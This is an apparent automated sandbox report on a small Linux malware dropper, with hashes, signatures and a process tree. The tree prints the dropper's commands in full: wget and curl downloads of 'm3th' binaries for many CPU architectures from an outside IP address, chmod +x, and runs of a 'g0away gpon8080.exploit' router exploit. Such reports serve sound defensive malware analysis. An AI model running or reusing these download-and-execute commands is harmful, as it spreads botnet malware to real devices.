Analysis

  • max time kernel
    80s
  • max time network
    128s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240729-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    28-07-2024 16:40

General

  • Target

    17f41b4b65e5ddad4a76594560d43927_JaffaCakes118

  • Size

    3KB

  • MD5

    17f41b4b65e5ddad4a76594560d43927

  • SHA1

    bb7691396c850ff2b4645b90336852650aa26eb6

  • SHA256

    36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588

  • SHA512

    602d2b3fda5948c263ab2c48f96993daf5ef404faec82cb2e7f55eae7c8dbed3525b6715f537629d7299c3f4e43077bcf1429b81375e7b2e16f398768920b322

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 13 IoCs
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
    /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
    1⤵
    • Writes file to tmp directory
    PID:1502
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
      2⤵
        PID:1503
      • /usr/bin/curl
        curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
        2⤵
          PID:1507
        • /bin/cat
          cat m3th.x86
          2⤵
            PID:1508
          • /bin/chmod
            chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT
            2⤵
              PID:1509
            • /tmp/g0away
              ./g0away gpon8080.exploit
              2⤵
              • Executes dropped EXE
              PID:1510
            • /usr/bin/wget
              wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
              2⤵
                PID:1512
              • /usr/bin/curl
                curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
                2⤵
                  PID:1513
                • /bin/cat
                  cat m3th.mips
                  2⤵
                    PID:1514
                  • /bin/chmod
                    chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT
                    2⤵
                      PID:1515
                    • /tmp/g0away
                      ./g0away gpon8080.exploit
                      2⤵
                      • Executes dropped EXE
                      PID:1516
                    • /usr/bin/wget
                      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
                      2⤵
                        PID:1518
                      • /usr/bin/curl
                        curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
                        2⤵
                          PID:1519
                        • /bin/cat
                          cat m3th.mpsl
                          2⤵
                            PID:1520
                          • /bin/chmod
                            chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT
                            2⤵
                              PID:1521
                            • /tmp/g0away
                              ./g0away gpon8080.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:1522
                            • /usr/bin/wget
                              wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
                              2⤵
                                PID:1524
                              • /usr/bin/curl
                                curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
                                2⤵
                                  PID:1525
                                • /bin/cat
                                  cat m3th.arm
                                  2⤵
                                    PID:1526
                                  • /bin/chmod
                                    chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT
                                    2⤵
                                      PID:1527
                                    • /tmp/g0away
                                      ./g0away gpon8080.exploit
                                      2⤵
                                      • Executes dropped EXE
                                      PID:1528
                                    • /usr/bin/wget
                                      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
                                      2⤵
                                        PID:1530
                                      • /usr/bin/curl
                                        curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
                                        2⤵
                                          PID:1531
                                        • /bin/cat
                                          cat m3th.arm5
                                          2⤵
                                            PID:1534
                                          • /bin/chmod
                                            chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
                                            2⤵
                                              PID:1535
                                            • /tmp/g0away
                                              ./g0away gpon8080.exploit
                                              2⤵
                                              • Executes dropped EXE
                                              PID:1536
                                            • /usr/bin/wget
                                              wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
                                              2⤵
                                                PID:1538
                                              • /usr/bin/curl
                                                curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
                                                2⤵
                                                  PID:1539
                                                • /bin/cat
                                                  cat m3th.arm6
                                                  2⤵
                                                    PID:1540
                                                  • /bin/chmod
                                                    chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
                                                    2⤵
                                                      PID:1541
                                                    • /tmp/g0away
                                                      ./g0away gpon8080.exploit
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:1542
                                                    • /usr/bin/wget
                                                      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
                                                      2⤵
                                                        PID:1544
                                                      • /usr/bin/curl
                                                        curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
                                                        2⤵
                                                          PID:1545
                                                        • /bin/cat
                                                          cat m3th.arm7
                                                          2⤵
                                                            PID:1546
                                                          • /bin/chmod
                                                            chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
                                                            2⤵
                                                              PID:1547
                                                            • /tmp/g0away
                                                              ./g0away gpon8080.exploit
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:1548
                                                            • /usr/bin/wget
                                                              wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
                                                              2⤵
                                                                PID:1550
                                                              • /usr/bin/curl
                                                                curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
                                                                2⤵
                                                                  PID:1551
                                                                • /bin/cat
                                                                  cat m3th.ppc
                                                                  2⤵
                                                                    PID:1552
                                                                  • /bin/chmod
                                                                    chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
                                                                    2⤵
                                                                      PID:1553
                                                                    • /tmp/g0away
                                                                      ./g0away gpon8080.exploit
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:1554
                                                                    • /usr/bin/wget
                                                                      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
                                                                      2⤵
                                                                        PID:1556
                                                                      • /usr/bin/curl
                                                                        curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
                                                                        2⤵
                                                                          PID:1557
                                                                        • /bin/cat
                                                                          cat m3th.m68k
                                                                          2⤵
                                                                            PID:1558
                                                                          • /bin/chmod
                                                                            chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
                                                                            2⤵
                                                                              PID:1559
                                                                            • /tmp/g0away
                                                                              ./g0away gpon8080.exploit
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              PID:1560
                                                                            • /usr/bin/wget
                                                                              wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
                                                                              2⤵
                                                                                PID:1562
                                                                              • /usr/bin/curl
                                                                                curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
                                                                                2⤵
                                                                                  PID:1563
                                                                                • /bin/cat
                                                                                  cat m3th.spc
                                                                                  2⤵
                                                                                    PID:1564
                                                                                  • /bin/chmod
                                                                                    chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
                                                                                    2⤵
                                                                                      PID:1565
                                                                                    • /tmp/g0away
                                                                                      ./g0away gpon8080.exploit
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1566
                                                                                    • /usr/bin/wget
                                                                                      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
                                                                                      2⤵
                                                                                        PID:1568
                                                                                      • /usr/bin/curl
                                                                                        curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
                                                                                        2⤵
                                                                                          PID:1569
                                                                                        • /bin/cat
                                                                                          cat m3th.i686
                                                                                          2⤵
                                                                                            PID:1570
                                                                                          • /bin/chmod
                                                                                            chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
                                                                                            2⤵
                                                                                              PID:1571
                                                                                            • /tmp/g0away
                                                                                              ./g0away gpon8080.exploit
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1572
                                                                                            • /usr/bin/wget
                                                                                              wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4
                                                                                              2⤵
                                                                                                PID:1574
                                                                                              • /usr/bin/curl
                                                                                                curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4
                                                                                                2⤵
                                                                                                  PID:1575
                                                                                                • /bin/cat
                                                                                                  cat m3th.sh4
                                                                                                  2⤵
                                                                                                    PID:1576
                                                                                                  • /bin/chmod
                                                                                                    chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
                                                                                                    2⤵
                                                                                                      PID:1577
                                                                                                    • /tmp/g0away
                                                                                                      ./g0away gpon8080.exploit
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1578
                                                                                                    • /usr/bin/wget
                                                                                                      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc
                                                                                                      2⤵
                                                                                                        PID:1580
                                                                                                      • /usr/bin/curl
                                                                                                        curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc
                                                                                                        2⤵
                                                                                                          PID:1581
                                                                                                        • /bin/cat
                                                                                                          cat m3th.arc
                                                                                                          2⤵
                                                                                                            PID:1582
                                                                                                          • /bin/chmod
                                                                                                            chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
                                                                                                            2⤵
                                                                                                              PID:1583
                                                                                                            • /tmp/g0away
                                                                                                              ./g0away gpon8080.exploit
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1584

                                                                                                          Network

                                                                                                          MITRE ATT&CK Matrix

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads